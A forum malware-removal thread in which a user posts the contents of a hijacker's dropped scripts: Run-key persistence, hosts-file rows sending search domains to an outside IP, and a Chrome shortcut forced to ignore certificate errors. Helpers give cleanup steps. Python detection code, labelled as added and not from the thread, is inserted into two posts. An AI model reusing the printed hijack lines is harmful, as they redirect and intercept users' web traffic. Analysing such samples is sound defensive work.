
Malware/rootkit connecting to external IP, halp me please?


  • This topic is locked
18 replies to this topic

#1 tomfullerton

tomfullerton

  • Members
  • 9 posts

Posted 22 January 2015 - 11:23 PM

Hello everyone,
 
I'd like some help with what I think is some sort of malware/rootkit that has infected my pc.
I think I need to do a series of thorough scans, since for a few days in a row I kept getting 5 processes (rundll32.exe) that would pop up an "open file with" window right after I booted. I never clicked Open, and eventually found out that the rundll32.exe was in C:\Windows\SysWOW64. I also did all scans with Malwarebytes, RogueKiller64 and Microsoft Essentials and haven't found much. But I also found a registry key under Computer\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce with the name Adobe Speed Launcher, which I don't quite like, and its value is set to 1421941580. Anyway, any help with a series of scans would be appreciated.
 
-I'm very confident that this is some sort of malware.
The reason is that this has never happened before, and there are 5 instances of said window right when I boot up. The other clue that this is not some legit program is that under the "Program/File" name I see MY first name, and that just can't be right.
 
-I've also found a "FILE" under C:\Users named "Tom", and I've attached it.
It looks super suspicious, I think. I scanned it with VirusTotal but it doesn't seem to find anything wrong with it; nonetheless, the results are here: https://www.virustot...sis/1421971881/
I proceeded to open it and it seems to be a text file with some code in it that I think is dead on some sort of malware trying to connect to some IP address that's not even mine: 69.162.120.131
 
 
UPDATE:
 
Now this is probably bad.
 
Another shortcut to a .exe file appeared on my desktop under the fake name "VLC Media Player", which I obviously have never installed since I hate that player.
The shortcut's target is "C:\Users\Tom Jones\AppData\Local\Temp\bcdcabfdbbfi.exe" C:\Users\TOMJO~1\AppData\Local\Temp\bcdcabfdbbfi.exe 7-5-1-8-9-0-7-5-3-1-1 KEtIPDQxMjAyHy5MUEFIQEQ2Kx0uTT5PVkdJS0I/OjAfKD9IS0tJPTguNjcrGy47QEQ2Kx0uT0tKQ006VFhEQTwwMCswGCZTPk1TRFFYUFFENGhtb205LihuZGpt
 
I also scanned this with VirusTotal and these are the results: https://www.virustot...sis/1421975128/
 
Someone's gotta help me get rid of this stuff, since apparently none of the tools I've used so far have detected anything...
 
 
-Pasted RogueKiller report AND MBAM log, FRST, Addition, OTL reports
 
 
 
 
 
RogueKiller V10.2.0.0 (x64) [Jan 19 2015] by Adlice Software
 
Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : Tom Jones [Administrator]
Mode : Scan -- Date : 01/22/2015 11:25:29
 
¤¤¤ Processes : 0 ¤¤¤
 
¤¤¤ Registry : 4 ¤¤¤
[PUM.DesktopIcons] (X64) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1 -> Found
[PUM.DesktopIcons] (X86) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1 -> Found
[PUM.DesktopIcons] (X64) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1 -> Found
[PUM.DesktopIcons] (X86) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1 -> Found
 
¤¤¤ Tasks : 0 ¤¤¤
 
¤¤¤ Files : 0 ¤¤¤
 
¤¤¤ Hosts File : 2 ¤¤¤
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 localhost
[C:\Windows\System32\drivers\etc\hosts] ::1 localhost
 
¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤
 
¤¤¤ Web browsers : 0 ¤¤¤
 
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD1502FAEX-007BA0 ATA Device +++++
--- User ---
[MBR] 97ed83405a22741aa5222a22e681b176
[BSP] e5e13b1e52b32315f7fa08500dcdf184 : Windows Vista/7/8 MBR Code
Partition table:
0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 1430797 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK
 
+++++ PhysicalDrive1: INTEL SS DSC2CW120A3 SCSI Disk Device +++++
--- User ---
[MBR] b7e0dc6f6c3f2ac7a7eca2b4ee48a17c
[BSP] 1f82269f5ba8a4c12ac33d16d54131fc : Windows Vista/7/8 MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 114371 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
Error reading LL2 MBR! ([1] Incorrect function. )
 
 
============================================
RKreport_DEL_01212015_224147.log - RKreport_DEL_01212015_224200.log - RKreport_DEL_01212015_225447.log - RKreport_DEL_01212015_225932.log
RKreport_DEL_01222015_001748.log - RKreport_SCN_01212015_223814.log - RKreport_SCN_01212015_224326.log - RKreport_SCN_01212015_225859.log
RKreport_SCN_01212015_233829.log - RKreport_SCN_01222015_001707.log
 
 
 
Thank you!

Attached Files



#2 Johnny Computer

Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • Gender:Male
  • Location:127.0.0.1

Posted 23 January 2015 - 10:38 AM

Hello TomFullerton-

My name is Johnny Computer and I will be helping you clean up your system.

PLEASE NOTE: Logs are often long, complicated, and time consuming to analyze.

Please give me some time to look over your logs and I will be back with further instructions A.S.A.P. :)


"DO OR DO NOT. THERE IS NO TRY."


#3 tomfullerton

tomfullerton
  • Topic Starter

  • Members
  • 9 posts

Posted 24 January 2015 - 12:36 AM

Hello again, I am really interested in what this script does, as I think it is trying to connect to an IP that is NOT mine or in my network.
 
Does anyone around here have any clue what this script is doing?
-This was a file without an extension, found in C:\Users\
Please let me know even if you know a bit of it.
 
@echo off Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat3" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Sys32.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat4" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Sys33.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat1" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Macrosoft.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat2" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Systm.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Windaws.bat" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /V "Start Page" /D "http://www.google.com" /F Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v HomePage /t REG_DWORD /d 1 /f Jones\AppData\Roaming\Windaws.bat
cd /D "%APPDATA%\Mozilla\Firefox\Profiles" Jones\AppData\Roaming\Windaws.bat
cd *.default Jones\AppData\Roaming\Windaws.bat
set buzaar=%cd% Jones\AppData\Roaming\Windaws.bat
echo user_pref("browser.newtab.url", "http://www.google.com");>>"%buzaar%\prefs.js" Jones\AppData\Roaming\Windaws.bat
echo user_pref("browser.startup.homepage", "http://www.google.com");>>"%buzaar%\prefs.js" Jones\AppData\Roaming\Windaws.bat
set buzaar= Jones\AppData\Roaming\Windaws.bat
cd %windir% Jones\AppData\Roaming\Windaws.bat
set bugalatasligala=%windir%\System32\drivers\etc\hosts Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.com" %bugalatasligala% || echo 69.162.120.131 www.google.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.bing.com" %bugalatasligala% || echo 69.162.120.131 www.bing.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.yahoo.com" %bugalatasligala% || echo 69.162.120.131 search.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.co.uk" %bugalatasligala% || echo 69.162.120.131 www.google.co.uk>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.ca" %bugalatasligala% || echo 69.162.120.131 www.google.ca>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.com.tr" %bugalatasligala% || echo 69.162.120.131 www.google.com.tr>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 isearch.babylon.com" %bugalatasligala% || echo 69.162.120.131 isearch.babylon.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.conduit.com" %bugalatasligala% || echo 69.162.120.131 search.conduit.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.yahoo.com" %bugalatasligala% || echo 69.162.120.131 www.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 us.yhs4.search.yahoo.com" %bugalatasligala% || echo 69.162.120.131 us.yhs4.search.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 r.search.yahoo.com" %bugalatasligala% || echo 69.162.120.131 r.search.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.aol.com" %bugalatasligala% || echo 69.162.120.131 www.aol.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.aol.com" %bugalatasligala% || echo 69.162.120.131 search.aol.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.comcast.net" %bugalatasligala% || echo 69.162.120.131 search.comcast.net>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.co.in" %bugalatasligala% || echo 69.162.120.131 www.google.co.in>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.ask.com" %bugalatasligala% || echo 69.162.120.131 www.ask.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 xfinity.comcast.net" %bugalatasligala% || echo 69.162.120.131 xfinity.comcast.net>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.avg.com" %bugalatasligala% || echo 69.162.120.131 search.avg.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
exit Jones\AppData\Roaming\Windaws.bat
SET wsc = WScript.CreateObject("WScript.Shell") Jones\AppData\Roaming\Systm.vbs
SET fso = WScript.CreateObject("Scripting.FileSystemObject") Jones\AppData\Roaming\Systm.vbs
If (fso.FileExists(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.LNK")) Then Jones\AppData\Roaming\Systm.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.LNK") Jones\AppData\Roaming\Systm.vbs
If (fso.FileExists("C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) Then Jones\AppData\Roaming\Systm.vbs
bozcaada.targetpath = "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" Jones\AppData\Roaming\Systm.vbs
else Jones\AppData\Roaming\Systm.vbs
bozcaada.targetpath = "C:\Program Files\Google\Chrome\Application\chrome.exe" Jones\AppData\Roaming\Systm.vbs
End If Jones\AppData\Roaming\Systm.vbs
bozcaada.Arguments = "http://www.google.com -ignore-certificate-errors --disable-show-modal-dialog --disable-infobars" Jones\AppData\Roaming\Systm.vbs
bozcaada.save() Jones\AppData\Roaming\Systm.vbs
End If 'uz Jones\AppData\Roaming\Systm.vbs
If (fso.FileExists(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.LNK")) Then Jones\AppData\Roaming\Sys33.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.LNK") Jones\AppData\Roaming\Sys33.vbs
If (fso.FileExists("C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) Then Jones\AppData\Roaming\Sys33.vbs
bozcaada.targetpath = "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" Jones\AppData\Roaming\Sys33.vbs
bozcaada.targetpath = "C:\Program Files\Mozilla Firefox\firefox.exe" Jones\AppData\Roaming\Sys33.vbs
bozcaada.Arguments = "http://www.google.com" Jones\AppData\Roaming\Sys33.vbs
End If 'ez Jones\AppData\Roaming\Sys33.vbs
If (fso.FileExists(wsc.SpecialFolders("desktop") & "\Mozilla Firefox.LNK")) Then Jones\AppData\Roaming\Sys32.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("desktop") & "\Mozilla Firefox.LNK") Jones\AppData\Roaming\Sys32.vbs
End If 'oz Jones\AppData\Roaming\Sys32.vbs
If (fso.FileExists(wsc.SpecialFolders("desktop") & "\Google Chrome.LNK")) Then Jones\AppData\Roaming\Macrosoft.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("desktop") & "\Google Chrome.LNK") Jones\AppData\Roaming\Macrosoft.vbs
End If 'az Jones\AppData\Roaming\Macrosoft.vbs
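The file Tom posted above explains itself once one notices the tail that every line carries. What follows is an added example, not code from the thread or from any tool named in it. It rests on an inference rather than on anything the thread states: the dropper wrote its components with unquoted cmd.exe redirects into C:\Users\Tom Jones\AppData\Roaming\, and because the profile path contains a space, cmd.exe took C:\Users\Tom as the redirect target and passed the remainder of the path through to echo. That would account for both the extension-less "Tom" file in C:\Users and the first-name artifact mentioned in the opening post. The sample below is a constructed subset of the posted lines; the regexes and function names are the example's own.

```python
r"""
Rebuild the scripts the hijacker in this thread dropped, starting from the
stray "Tom" file in C:\Users, and pull indicators out of them.

Added example, not code from the thread. Assumption (an inference, not a
statement from the thread): the dropper ran unquoted redirects such as

    echo @echo off>>C:\Users\Tom Jones\AppData\Roaming\Windaws.bat

so cmd.exe wrote to C:\Users\Tom and echo printed the rest of the path.
Every captured line therefore ends with the tail of its intended path.
"""
import re
from collections import defaultdict

# Constructed sample: a subset of the lines from the posted "Tom" file.
CAPTURED = r"""@echo off Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat3" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Sys32.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Windaws.bat" Jones\AppData\Roaming\Windaws.bat
set bugalatasligala=%windir%\System32\drivers\etc\hosts Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.com" %bugalatasligala% || echo 69.162.120.131 www.google.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.bing.com" %bugalatasligala% || echo 69.162.120.131 www.bing.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.yahoo.com" %bugalatasligala% || echo 69.162.120.131 search.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
exit Jones\AppData\Roaming\Windaws.bat
SET wsc = WScript.CreateObject("WScript.Shell") Jones\AppData\Roaming\Systm.vbs
bozcaada.targetpath = "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" Jones\AppData\Roaming\Systm.vbs
bozcaada.Arguments = "http://www.google.com -ignore-certificate-errors --disable-show-modal-dialog --disable-infobars" Jones\AppData\Roaming\Systm.vbs
bozcaada.save() Jones\AppData\Roaming\Systm.vbs
"""

# The tail of the intended path that cmd.exe left behind on every line.
SUFFIX = re.compile(r" Jones\\AppData\\Roaming\\(\w+\.(?:bat|vbs))$")


def model_cmd_redirect(cmdline):
    """Simplified model of cmd.exe parsing an unquoted output redirect: the
    target runs to the first whitespace and whatever follows stays part of
    the command, so echo prints it. Returns (target, text_written)."""
    m = re.search(r">>?(\S+)", cmdline)
    if not m:
        return None, cmdline
    rest = cmdline[:m.start()] + cmdline[m.end():]
    text = rest[len("echo "):] if rest.startswith("echo ") else rest
    return m.group(1), text


def split_captured(text):
    """Group captured lines by the script they were meant for, tail removed."""
    scripts = defaultdict(list)
    for line in text.splitlines():
        m = SUFFIX.search(line)
        if m:
            scripts[m.group(1)].append(line[:m.start()])
    return dict(scripts)


HOSTS_ENTRY = re.compile(r"echo (\d{1,3}(?:\.\d{1,3}){3}) ([^\s>]+)>>")
RUN_VALUE = re.compile(r'REG ADD "HKCU\\[^"]*\\Run" /V "([^"]+)".*?/D "([^"]+)"', re.I)
SHORTCUT_ARGS = re.compile(r'\.Arguments = "([^"]*)"')


def extract_iocs(scripts):
    """Hosts-file redirects, Run-key persistence and shortcut arguments."""
    iocs = {"hosts": [], "run_keys": [], "shortcut_args": []}
    for name, lines in scripts.items():
        for line in lines:
            if m := HOSTS_ENTRY.search(line):
                iocs["hosts"].append((m.group(1), m.group(2)))
            if m := RUN_VALUE.search(line):
                iocs["run_keys"].append((m.group(1), m.group(2)))
            if m := SHORTCUT_ARGS.search(line):
                iocs["shortcut_args"].append((name, m.group(1)))
    return iocs


def summarize(text):
    """Rebuild the scripts, extract IOCs, and group redirected hosts by IP."""
    scripts = split_captured(text)
    iocs = extract_iocs(scripts)
    by_ip = defaultdict(list)
    for ip, host in iocs["hosts"]:
        by_ip[ip].append(host)
    return scripts, iocs, dict(by_ip)


if __name__ == "__main__":
    scripts, iocs, by_ip = summarize(CAPTURED)
    for name, lines in scripts.items():
        print(f"--- {name} ({len(lines)} lines) ---")
        print("\n".join(lines))
    print("Run-key persistence:", iocs["run_keys"])
    print("Hosts redirects:", by_ip)
    print("Shortcut arguments:", iocs["shortcut_args"])
```

Run as a script it prints the rebuilt Windaws.bat and Systm.vbs and the indicators pulled from them. Two things the rebuilt batch file shows are worth keeping in mind during cleanup: the `find "..." hosts || echo ...>>hosts` idiom only appends a row when it is absent, so the rewrite is idempotent and re-runs silently on every logon through the appdat Run value that points back at Windaws.bat; removing the hosts rows alone therefore does nothing lasting, the Run values and the dropped .bat/.vbs files have to go as well.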

 



#4 Johnny Computer

Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • Gender:Male
  • Location:127.0.0.1

Posted 24 January 2015 - 10:21 AM

Hi TomFullerton-
 
 


Hello and welcome to BLEEPING COMPUTER

My name is Johnny Computer and I will be helping you with your malware related computer issues today.

Before we move on, please read the following points carefully.

 
§  First, I would like to inform you that most of us here at Bleeping Computer are volunteers. The logs you will be asked to submit can take time to analyze. Please try to match our commitment to you with your patience toward us.
§  Please read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
§  IMPORTANT-----> Post all logfiles as a reply rather than as an attachment. If you can not post all log files in one reply, feel free to use more posts.
§  Perform everything in the correct order. Sometimes one step requires the previous one.
§  If you have any problems while following my instructions, Stop and ask any questions you may have.
§  Please stay with me until I have notified you that your system is All Clean. Absence of symptoms does not necessarily mean your machine is clean.  
§  If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed.
§  IMPORTANT NOTE : Please do not delete, download or install anything unless instructed to do so.
DO NOT use any TOOLS such as Combofix or HijackThis fixes without supervision. Doing so could make your system inoperable.

 
  --------------------------------------------------------------------------------------------
 

 P2P/TORRENT WARNING

 
Going over your logs I noticed that you have uTorrent installed.
 
§  Avoid gaming sites, pirated software, cracking tools, keygens, and peer-to-peer (P2P) file sharing programs.
§  They are a security risk which can make your computer susceptible to a wide variety of malware infections, remote attacks, exposure of personal information, and identity theft. Many malicious worms and Trojans spread across P2P file sharing networks, gaming and underground sites.
§  Users visiting such pages may see innocuous-looking banner ads containing code which can trigger pop-up ads and malicious Flash ads that install viruses, Trojans and spyware. Ads are a target for hackers because they offer a stealthy way to distribute malware to a wide range of Internet users.
§  The best way to reduce the risk of infection is to avoid these types of web sites and not use any P2P applications.
 

It is pretty much certain that if you continue to use P2P programs, you will get infected again.


I would recommend that you uninstall uTorrent; however, that choice is up to you. If you wish to keep it, please do not use it until your computer is cleaned.

 
 --------------------------------------------------------------------------------------------------------------------------------------------------------------------
 

Does anyone around here have any clue what this script is doing?

This script is definitely malicious and is patching your hosts file and some shortcuts. Let's see if we can find some more components that belong to it.
 ----------------------------------------------------------------------------------------------------------------------
 
PLEASE DO THE FOLLOWING:
  • Now please download Combofix from here.

  • Save it to your Desktop.

  • Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools. Please refer to this link for instructions.

  • Double click it & follow the prompts.

  • If you receive a UAC prompt asking if you want to continue running the program, you should press the Continue button.

  • Click on Yes, to continue scanning for malware.

  • When finished, it will produce a log for you.

  • Please include the C:\ComboFix.txt in your next reply.

  • Note: After running Combofix, you may receive an error about "illegal operation on a registry key that has been marked for deletion." If you receive this error, please reboot and it should disappear.
Do not touch your mouse/keyboard until the ComboFix scan has completed, as this may cause the process to stall or the computer to lock.
 
---------------------------------------------------------------------------------------------------------------
 
IN YOUR NEXT REPLY I NEED:
 
1.)  Your Combofix log
 
Thanks   :)

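Johnny's diagnosis above, hosts file plus shortcuts, can be turned into a check. The following is an added example, not code from the thread or from ComboFix or any other tool it names. It runs on a constructed hosts file and on shortcut fields (name, target, arguments) built from values posted in this thread; on a real machine the hosts text would be read from C:\Windows\System32\drivers\etc\hosts and the shortcut fields parsed out of .lnk files, which needs an LNK parser this example does not include. The watch-list, the flag list and the function names are the example's own. The ignore-certificate-errors switch in the rewritten Chrome shortcut deserves the most attention: once www.google.com resolves to 69.162.120.131 through the hosts file, that host cannot present a certificate valid for google.com, and the switch tells Chrome to proceed anyway.

```python
r"""
Check a Windows hosts file and browser shortcuts for the hijack described in
this thread. Added example, not from the thread or any tool it names. Hosts
text and shortcut tuples below are constructed from values in the thread; a
real run reads C:\Windows\System32\drivers\etc\hosts and parses .lnk files
(LNK parsing is not included here).
"""
import ipaddress
import re

# Constructed hosts file: the Windows defaults, two rows the batch file adds,
# and one legitimate private-network entry that must not be flagged.
SAMPLE_HOSTS = """# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
69.162.120.131 www.google.com
69.162.120.131 search.yahoo.com   # added by the hijacker
192.168.1.50 nas.home
"""

# Search and portal domains the posted batch file rewrites; a hosts entry for
# any of these is suspect whatever address it points at.
WATCHLIST = {"www.google.com", "www.bing.com", "search.yahoo.com",
             "www.yahoo.com", "www.ask.com", "www.aol.com", "search.aol.com"}


def hosts_hijacks(text):
    """Return (ip, hostname) for rows that map a watch-listed name, or any
    name to a globally routable address. Loopback rows are ignored, as are
    private-range entries for names outside the watch-list."""
    hits = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            continue  # malformed row; leave it for a human to look at
        if addr.is_loopback:
            continue
        for name in names:
            if addr.is_global or name.lower() in WATCHLIST:
                hits.append((ip, name))
    return hits


BROWSERS = ("chrome.exe", "firefox.exe", "iexplore.exe")
# Chrome switches seen in the posted Systm.vbs. ignore-certificate-errors is
# the dangerous one: with the hosts rewrite in place it lets the foreign host
# answer for HTTPS sites without a valid certificate.
RISKY_FLAGS = ("ignore-certificate-errors", "disable-infobars",
               "disable-show-modal-dialog")


def shortcut_findings(shortcuts):
    """shortcuts: iterable of (name, target, arguments) read from .lnk files.
    Flags browser shortcuts that force a URL or carry a risky switch, and any
    shortcut whose target runs from the user's Temp folder."""
    findings = []
    for name, target, args in shortcuts:
        if re.search(r"\\appdata\\local\\temp\\", target, re.I):
            findings.append((name, "target runs from %TEMP%: " + target))
        if target.lower().endswith(BROWSERS):
            if re.search(r"https?://", args, re.I):
                findings.append((name, "forced start URL in arguments: " + args))
            bad = [f for f in RISKY_FLAGS
                   if re.search(r"(?<!\S)-{1,2}" + re.escape(f) + r"\b", args)]
            if bad:
                findings.append((name, "risky switches: " + ", ".join(bad)))
    return findings


# Constructed from the thread: the rewritten Chrome shortcut, the fake
# "VLC Media Player" shortcut into Temp, and an untouched Firefox shortcut.
SAMPLE_SHORTCUTS = [
    ("Google Chrome.lnk",
     r"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe",
     "http://www.google.com -ignore-certificate-errors --disable-show-modal-dialog --disable-infobars"),
    ("VLC Media Player.lnk",
     r"C:\Users\Tom Jones\AppData\Local\Temp\bcdcabfdbbfi.exe",
     "7-5-1-8-9-0-7-5-3-1-1 KEtIPDQxMjAyHy5MUEFIQEQ2Kx0uTT5PVkdJS0I/OjAfKD9IS0tJPTguNjcrGy47QEQ2Kx0uT0tKQ006VFhEQTwwMCswGCZTPk1TRFFYUFFENGhtb205LihuZGpt"),
    ("Mozilla Firefox.lnk", r"C:\Program Files\Mozilla Firefox\firefox.exe", ""),
]


def triage(hosts_text, shortcuts):
    """Both checks in one report."""
    return {"hosts": hosts_hijacks(hosts_text),
            "shortcuts": shortcut_findings(shortcuts)}


if __name__ == "__main__":
    report = triage(SAMPLE_HOSTS, SAMPLE_SHORTCUTS)
    for ip, host in report["hosts"]:
        print(f"hosts: {host} -> {ip}")
    for name, why in report["shortcuts"]:
        print(f"shortcut: {name}: {why}")
```

The hosts check deliberately does not flag private-range entries for names outside the watch-list, since those are how people point at their own NAS or test boxes; everything that lands on a public address is reported and left to the analyst. The shortcut check is a triage aid, not proof: a legitimate shortcut can carry a URL, but one that also passes ignore-certificate-errors, or whose target sits in %TEMP%, is what this thread's sample looks like.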


#5 tomfullerton

tomfullerton
  • Topic Starter

  • Members
  • 9 posts

Posted 24 January 2015 - 12:37 PM

Hello again good sir, apparently all my other forum posts on forums such as malwaretips and malwarebytes were closed since "no more than 1 person can try and help me", so props to twinheadedhomo for that.

 

Anyway, you're my last hope and I have attached the ComboFix log.

 

Thank you in advance!

Attached Files



#6 Johnny Computer

Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • Gender:Male
  • Location:127.0.0.1

Posted 25 January 2015 - 08:34 AM

Hello TomFullerton-

As requested in my welcome speech:

IMPORTANT-----> Post all logfiles as a reply rather than as an attachment. If you can not post all log files in one reply, feel free to use more posts.

 

 

-------------------------------------------------------------------------------------------------------------------------------------------------------

 

We need to run a combofix script.  Please do the following:

 

§  Close any open browsers.

§  Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.

§  Open Notepad and copy/paste the text below into the Notepad document

    

Registry::
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"Adobe Speed Launcher"=-

§  Save this on your desktop as CFScript.txt

 

[image: CFScript.txt being dragged onto ComboFix.exe]

 

§  Referring to the picture above, drag CFScript.txt into ComboFix.exe

§  When finished, it will create a log for you at C:\ComboFix.txt. Please copy/paste the information in your next reply.

 

 ------------------------------------------------------------------------------------

 

IN YOUR NEXT REPLY I NEED:

 

1.) Your Combofix log

2.)  How is your system running now?  Are you experiencing all, some, or none of the previous issues?

 

 

Thanks :)




#7 tomfullerton

tomfullerton
  • Topic Starter

  • Members
  • 9 posts

Posted 25 January 2015 - 07:16 PM

Hello again,

 

1. -I had to change the registry key from RunOnce to runonce since the prior did not exist. Other than that, here's the report ComboFix generated:

2. -The file is still there, the "Tom" file in C:\Users. I ought to delete it.

 

 

 

 

ComboFix 15-01-22.02 - Tom Jones 01/25/2015  19:05:35.2.8 - x64
Microsoft Windows 7 Ultimate   6.1.7601.1.1252.1.1033.18.16351.13584 [GMT -5:00]
Running from: c:\users\Tom Jones\Downloads\ComboFix.exe
Command switches used :: c:\users\Tom Jones\Downloads\CFScript.txt
AV: Microsoft Security Essentials *Disabled/Updated* {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
SP: Microsoft Security Essentials *Disabled/Updated* {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
(((((((((((((((((((((((((   Files Created from 2014-12-26 to 2015-01-26  )))))))))))))))))))))))))))))))
.
.
2015-01-26 00:07 . 2015-01-26 00:07 -------- d-----w- c:\users\Default\AppData\Local\temp
2015-01-25 23:56 . 2015-01-25 23:56 -------- d-----w- c:\users\Tom Jones\AppData\Roaming\JetBrains
2015-01-25 06:53 . 2014-12-02 10:26 11870360 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{EEAA395E-0928-4A6F-B6C4-52C7DC6E3B95}\mpengine.dll
2015-01-25 01:11 . 2015-01-25 01:11 -------- d-----w- c:\program files (x86)\Common Files\Java
2015-01-24 17:40 . 2014-12-02 10:26 11870360 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
